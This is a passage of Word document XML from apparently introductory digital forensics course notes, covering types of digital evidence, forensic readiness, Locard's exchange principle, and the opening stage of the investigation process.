          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the method and the weakness that was used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Support legal or disciplinary action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — evidence that can stand up in court or in an internal enquiry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Help prevent repeat incidents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — findings feed back into better security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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An important attitude</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">An investigator’s job is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to prove someone guilty. The job is to find out what the evidence actually shows — even if that clears the suspect. Conclusions must follow the evidence, not the expectation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Digital Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is any information stored or sent in digital form that may help prove or disprove a fact in an investigation. A file is just data; it becomes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when we can show where it came from, that it is relevant to the case, and that it has not been altered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What counts as digital evidence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Files and folders — documents, spreadsheets, images, videos, source code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Emails and chat messages (WhatsApp, Telegram, SMS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser history, cookies, downloads and search terms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">System and application logs (Windows event logs, Linux auth.log, web-server logs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Registry entries, prefetch files, LNK shortcuts, USB connection history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network packets, firewall, proxy and DNS logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Memory contents (running processes and connections).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — data about data, such as creation time, author, GPS position inside a photo, or device details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Special nature of digital evidence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Property</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 for an investigator</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Fragile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It can be changed or deleted by a single click, or even by simply switching on a computer (timestamps change).</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Easy to copy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perfect copy can be made, so the investigator works on a copy and keeps the original safe.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Can exist in many places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same file may be on a laptop, a cloud account and a phone at the same time.</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Often invisible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Much evidence (deleted files, hidden metadata, logs) is not seen by a normal user and needs special tools.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Volatile or non-volatile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Some data vanishes when power is lost (RAM); some stays (disk). This decides what must be collected first.</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Correlating evidence</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A single clue rarely proves anything. Suppose a file was opened at 10:30. That alone does not show copying. Add: a USB device connected at 10:32, the same file accessed again at 10:33, and a network connection to another system at 10:35. Together, these related traces give a much stronger and more reliable picture than any one of them.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic readiness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic readiness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means an organisation prepares </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an incident so that useful evidence is available when something goes wrong. If logs were never kept, or were deleted after a week, the investigation becomes very hard. A forensically ready organisation does the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keeps important logs (login records, system activity, network activity) for a defined period.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keeps the clocks of all systems synchronised (using NTP), so timestamps from different machines can be compared.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Protects logs from being edited or deleted, for example by sending them to a separate log server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defines written procedures for collecting, storing and handing over evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trains staff in what to do (and not to do) when an incident is found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Knows in advance when to involve legal teams or the police.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 Locard’s Exchange Principle in the Digital World</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Edmond Locard, a French forensic scientist, stated that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">whenever two things come into contact, there is an exchange of material between them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. In a physical crime scene, a burglar may leave fingerprints, hair or footprints behind and may carry away dust or fibres from the scene. Hence the famous summary: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">“Every contact leaves a trace.”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The same idea applies to computers. Every time a person (or a program) interacts with a digital system, the system records something about it — a log entry, a timestamp, a registry value, a cached file. The attacker leaves traces on the victim’s system, and also carries traces of the victim’s system away.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898"/>
        <w:gridCol w:w="5848"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Digital action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="584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Trace it may leave behind</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logs in</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Entry in the authentication/event log (time, account, source)</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USB drive is connected</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Registry entries (device name, serial number), event log entries</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Website is visited</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Browser history, cache, cookies, DNS records</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file is opened or edited</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Recent-files list, LNK shortcut, file timestamps, application records</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program is run</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Prefetch file, process records, event logs</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is sent over the network</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Firewall and proxy logs, packet captures, NetFlow records</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Limits of the principle</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Locard’s principle tells the investigator </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">where to look</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> for traces. It does </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> by itself prove </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">who</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> did the action — someone else may have used the same account, or the trace may have been planted. Traces must be backed up by corroborating evidence.</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Locard’s principle in practice</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Timeline found on a suspect PC: 23:40 confidential document opened → 23:42 USB device connected → 23:44 same document accessed again → 23:47 USB removed.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">This pattern suggests copying, but a good investigator does not stop here. The next step is to look for supporting traces: the USB serial number in the registry, file-system timestamps, LNK files on the USB, and event logs. Only then can the conclusion be stated with confidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.6 The Digital Forensics Investigation Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A forensic investigation follows a fixed sequence of stages. Following the same order every time makes the work reliable, repeatable and defensible in court. The six stages in your syllabus are:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Digital forensics investigation process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rPr>
          <w:cantSplit/>
        </w:trPr>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1. Identification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2. Preservation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3. Collection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4. Examination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5. Analysis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6. Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 1 — Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here the investigator understands the incident and decides what to look for. It answers: what happened, when was it discovered, which systems, users and accounts may be involved, what kind of evidence might exist, and whether the system is still running.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
